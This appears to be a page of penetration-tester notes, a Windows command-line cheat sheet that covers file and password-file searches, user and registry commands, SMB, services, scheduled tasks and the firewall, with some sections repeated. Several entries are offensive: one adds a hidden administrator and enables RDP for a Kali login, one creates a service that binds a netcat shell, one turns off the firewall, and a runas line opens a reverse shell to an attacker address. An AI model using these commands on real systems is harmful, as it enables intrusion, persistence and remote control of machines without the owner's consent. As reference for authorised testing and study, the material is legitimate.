1 Windows cmd kungfu

Search

type myfile   ..display
type *.txt    ..multiple
type my1 my2  ..multiple
type my1 | find /i "pass"  ..search-in-file
type my1 | findstr [regex]
more my1      ..onepage-at-a-time
set          ..view env vars
set path     ..view path
set username ..view usern

dir /b /s mydir\file
dir /b /s c:\pass.txt
dir /b /s %systemroot%\hosts
b - bare 
s - subdir/recurse

search all of c: for 'pass.txt' even subfolders
wildcards are supported too

--------------------
--------------------
Software Inventory Search:
dir /s "c:\Program Files"
dir /s "c:\Program Files (x86)"

Read Files

type myfile                  ..display
type *.txt                   ..multiple
type my1 my2                 ..multiple
type my1 | find /i "pass"    ..search-in-file
type my1 | findstr [regex]   ..regex
more my1                     ..onepage-at-a-time

Environment

set           ..view env vars
set path      ..view path
set username  ..view usern

Search:

b - bare
s - subdir/recurse

dir /b /s mydir\file
dir /b /s c:\pass.txt          ..search all of c: for 'pass.txt'
dir /b /s %systemroot%\hosts   ..find the hosts file

Software Inventory Search:

dir /s "c:\Program Files"
dir /s "c:\Program Files (x86)"

Windows Users

net user 
net user mike p$$wrd /add 
net user mike /del

net localgroup 
net localgroup administrators 
net localgroup administrators mike /add 
net localgroup administrators mike /del

AD Lockout Settings

net accounts /domain

RDP Trick

REF: PrivEscWin-Churrasco

> net user
> net user mikes hacks /add
> net localgroup administrators mikes /add

Allow Remote Access:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Kali:
> sudo apt-get update
> sudo apt-get install rdesktop
> rdesktop -u mike -p hacks legacy    ..CONNECT WITH RDP !!!

Windows Password policy

net accounts
net accounts /domain
wmic useraccount list brief

Windows registry

reg query key1
reg \\mypc query key1
reg add key1 /v value /t type /d data
reg export key1 key.reg
reg import key.reg

Windows smb

REF: MoveFilesSMB

session:
net use \\IP pw /u:bob

mount:
net use * \\IP\share pw /u:bob
net use \\IP /del
net use * /del /y

may need:
/u:machinename\bob

Windows services

sc query sc query state= all 
sc qc svcname sc \10.0.0.5 qc mysvc 
sc start mysvc 
sc config mysvc start= demand 
sc stop mysvc services.msc ..gui 

wmic: 
where (displayname like "%hello%") get name

Windows psexec

net use \\$IP /u:bob            ..get smb session
psexec \\$IP -d -u -p command   ..leaves svc @finish
psexec \\$IP ipconfig
psexec \\$IP cmd.exe
psexec \\$IP cmd.exe -s -d      ..system, detached/background

Windows schedule tasks

schtasks /query /s $IP
schtasks /create /tn taskname /s $IP /u bob /p pass
/sc freq /st stime /sd sdate /tr command

schtasks /create /tn taskname /s $IP /ru   ..system
/sc HOURLY/ONCE/DAILY /st HH:MM:SS 
/sd sdate /tr command

Windows Services & Processes

net use \\$IP /u:bob  ..get smb session first!!
sc \\$IP query schedule
sc \\$IP create svcnm binpath= mycmd               ..30 sec
sc \\$IP create svcnm binpath= "cmd.exe /k mycmd"  ..will die
sc \\$IP create ncsvc binpath= "cmd.exe /k c:\Tools\nc.exe -lp 4444 -e cmd.exe"

sc \\$IP start svcnm
net time \\$IP

or 'ServifyThis'

wmic /node:/10.x.x.x /user:bobadmin /password:p@ss process call create [command]

Multiples sessions!
wmic /node:@C:\tmp\iplist /user:bob /password:paxx
process call create [command]

Look at processes:
wmic /node:/$IP /user:bob /password:paxx
process list brief
process where processid="PID" delete
process where name="[name]" delete

Windows Firewall

netsh /?   ..view network settings
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
netsh advfirewall firewall add rule name "Comment" dir=in action=allow remoteid=$IP protocol=TCP localport=23
netsh advfirewall firewall del rule name "Comment"

Port-forward:
netsh interface portproxy add v4tov4 listenport=8000 connectport=80 connectaddress=$IP

runas

Creates a reverse shell from a windows server to Kali
Using netcat for Windows and Runas.exe:

C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc $IP 4444 -e cmd.exe"

Enter the password for Test:
Attempting to start nc.exe as user "COMPUTERNAME\Test" ...

Previous07 Windows PrivEsc Next2 Enums

Last updated 2 years ago

Was this helpful?